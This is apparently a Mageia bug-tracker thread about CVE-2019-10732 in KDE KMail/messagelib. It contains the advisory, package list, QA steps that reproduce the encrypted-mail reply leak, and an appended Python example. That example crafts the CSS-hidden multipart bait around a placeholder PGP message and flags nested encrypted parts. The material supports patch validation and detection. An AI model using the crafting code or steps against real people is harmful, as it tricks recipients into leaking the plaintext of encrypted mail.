openSUSE has issued an advisory today (January 30): https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UIP7JD6E7AKTOSG2IAFVY4AE7G4NZIKB/ They added this patch to fix it: https://build.opensuse.org/package/view_file/openSUSE:Leap:15.1:Update/messagelib/CVE-2019-10732.patch?expand=1
Link to the upstream commit: https://github.com/KDE/messagelib/commit/8f9b85b664be0987014c5d2485e706ab5a198e1b
CC: (none) => mageia
The real commit is this one https://github.com/KDE/messagelib/commit/a58286aec8f300d78c570726924baa91d9a22771
CC: (none) => geiger.david68210
Done for mga7!
Advisory:
========================

Updated messagelib packages fix security vulnerability:

In KDE KMail, an attacker in possession of S/MIME or PGP encrypted emails can wrap them as sub-parts within a crafted multipart email. The encrypted part(s) can further be hidden using HTML/CSS or ASCII newline characters. This modified multipart email can be re-sent by the attacker to the intended receiver. If the receiver replies to this (benign looking) email, they unknowingly leak the plaintext of the encrypted message part(s) back to the attacker (CVE-2019-10732).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10732
https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UIP7JD6E7AKTOSG2IAFVY4AE7G4NZIKB/
========================

Updated packages in core/updates_testing:
========================
messagelib-19.04.0-1.1.mga7
libkf5messagecomposer5-19.04.0-1.1.mga7
libkf5messagecore5-19.04.0-1.1.mga7
libkf5messagelist5-19.04.0-1.1.mga7
libkf5messageviewer5-19.04.0-1.1.mga7
libkf5templateparser5-19.04.0-1.1.mga7
libkf5mimetreeparser5-19.04.0-1.1.mga7
libkf5webengineviewer5-19.04.0-1.1.mga7
libkf5messagelib-devel-19.04.0-1.1.mga7

from messagelib-19.04.0-1.1.mga7.src.rpm
Assignee: kde => qa-bugs
David, are you sure? This is not what is written here: https://security-tracker.debian.org/tracker/CVE-2019-10732
Yes, sure, see https://github.com/KDE/messagelib/commits/Applications/19.04
Commits on May 12, 2019: Merge branch 'CVE-2019-10732' into Applications/19.04
If you look at the patch, it's actually multiple commits.
PoC in upstream GitHub.

On MGA7 Plasma x86_64, KMail already set up:
- Send myself an encrypted mail from KMail with account 1 (using 2 email accounts).
- Use Thunderbird (which does not have the private key of account 1) to resend this encrypted mail as an attachment from account 2 to account 1.
- In KMail, view the message from Thunderbird with the encrypted mail as attachment.
- Use reply in KMail to account 2.
- In Thunderbird (account 2): the previously encrypted attached mail is shown decrypted!

Using the QA repo:
- Use new mail. Send encrypted and signed emails. OK
- Basic functionality is the same.
- Redo the above test. At the end, the previously encrypted attached mail is still encrypted.

Giving this an OK. MGA7-64-OK

Validating. Advisory pushed to SVN.
Whiteboard: (none) => MGA7-64-OK
CVE: (none) => CVE-2019-10732
CC: (none) => ouaurelien, sysadmin-bugs
Keywords: (none) => advisory, validated_update
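The crafted message described in the advisory and reproduced in the QA test above, as an added example in Python (it is not code from messagelib, from the openSUSE patch, or from this bug report). It builds the benign-looking wrapper around a constructed stand-in for an intercepted PGP/MIME mail, either as a message/rfc822 attachment (what "forward as attachment" in Thunderbird produces) or as a direct multipart sub-part (what the advisory text describes), and then walks the resulting MIME tree to flag encrypted parts that sit below the root of the message. That structural condition is the one a reply composer must not quote decrypted text from; whether messagelib's own fix is implemented this way is not something this page states. The addresses, the "enc" boundary, the ciphertext and the display:none hiding are constructed placeholders, and the check is purely structural (no decryption is attempted).

```python
"""Added example: build the crafted multipart from CVE-2019-10732 and flag
encrypted MIME parts that are nested below the top level of a message."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed stand-in for an intercepted PGP/MIME mail (RFC 3156 layout).
# The OpenPGP block is a placeholder; nothing below tries to decrypt it.
CAPTURED_ENCRYPTED_MAIL = b"""\
From: account1@example.invalid
To: account1@example.invalid
Subject: original encrypted mail
MIME-Version: 1.0
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted";
 boundary="enc"

--enc
Content-Type: application/pgp-encrypted

Version: 1

--enc
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----

hQEMA0xMQ0VPRk1BQ0UBB/9PLACEHOLDERCIPHERTEXT
=abcd
-----END PGP MESSAGE-----

--enc--
"""

ENCRYPTED_TYPES = {
    "multipart/encrypted",      # PGP/MIME (RFC 3156)
    "application/pkcs7-mime",   # S/MIME (RFC 8551)
    "application/x-pkcs7-mime",
}


def craft_reply_bait(captured: bytes, as_rfc822: bool = True) -> bytes:
    """Wrap a captured encrypted mail inside a benign-looking multipart mail.

    as_rfc822=True mimics 'forward as attachment' (a message/rfc822 part, as in
    the QA reproduction); False places the multipart/encrypted body directly as
    a sibling sub-part, as the advisory describes.  The HTML alternative hides
    its only mention of the attachment with CSS (constructed example of the
    "hidden using HTML/CSS" technique), so the victim sees just a short question.
    """
    enc = BytesParser(policy=policy.default).parsebytes(captured)
    bait = EmailMessage()
    bait["From"] = "account2@example.invalid"   # attacker-controlled, constructed
    bait["To"] = "account1@example.invalid"     # holder of the private key
    bait["Subject"] = "quick question"
    bait.set_content("Hi, can you confirm you got this? Thanks!")
    bait.add_alternative(
        "<html><body><p>Hi, can you confirm you got this? Thanks!</p>"
        '<div style="display:none">see attached</div></body></html>',
        subtype="html",
    )
    if as_rfc822:
        bait.add_attachment(enc)                # becomes a message/rfc822 part
    else:
        for h in list(enc.keys()):              # keep only the Content-* headers
            if not h.lower().startswith("content-"):
                del enc[h]
        bait.make_mixed()
        bait.attach(enc)                        # multipart/encrypted as a sub-part
    return bait.as_bytes()


def find_encrypted_parts(msg, path=()):
    """Yield (path, content_type) for every encrypted part in the MIME tree.

    path is the route of payload indexes from the root, so () means the whole
    message is encrypted (the normal, safe layout).
    """
    ctype = msg.get_content_type()
    if ctype in ENCRYPTED_TYPES:
        yield path, ctype
        return                                  # do not descend into ciphertext
    if msg.is_multipart():                      # multipart/* and message/rfc822
        for i, part in enumerate(msg.get_payload()):
            yield from find_encrypted_parts(part, path + (i,))


def nested_encrypted_parts(raw: bytes) -> list:
    """Return the encrypted parts that sit below the root of the message.

    A reply composer that quotes decrypted content must not pull text from
    these: their plaintext is what the attacker is fishing for.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return [(p, t) for p, t in find_encrypted_parts(msg) if p]


if __name__ == "__main__":
    print("original:", nested_encrypted_parts(CAPTURED_ENCRYPTED_MAIL))
    print("as attachment:", nested_encrypted_parts(craft_reply_bait(CAPTURED_ENCRYPTED_MAIL)))
    print("as sub-part:", nested_encrypted_parts(craft_reply_bait(CAPTURED_ENCRYPTED_MAIL, as_rfc822=False)))
```

The original message reports no nested parts, while both crafted variants report exactly one encrypted part below the root, at path (1, 0) for the message/rfc822 form and (1,) for the direct sub-part form. The check deliberately stops at the first encrypted node and never decrypts, so it can run on the wire or in a mail client before any key material is touched; it does not, on its own, tell you whether the sender actually possesses the ciphertext legitimately.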
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2021-0067.html
Status: NEW => RESOLVED
Resolution: (none) => FIXED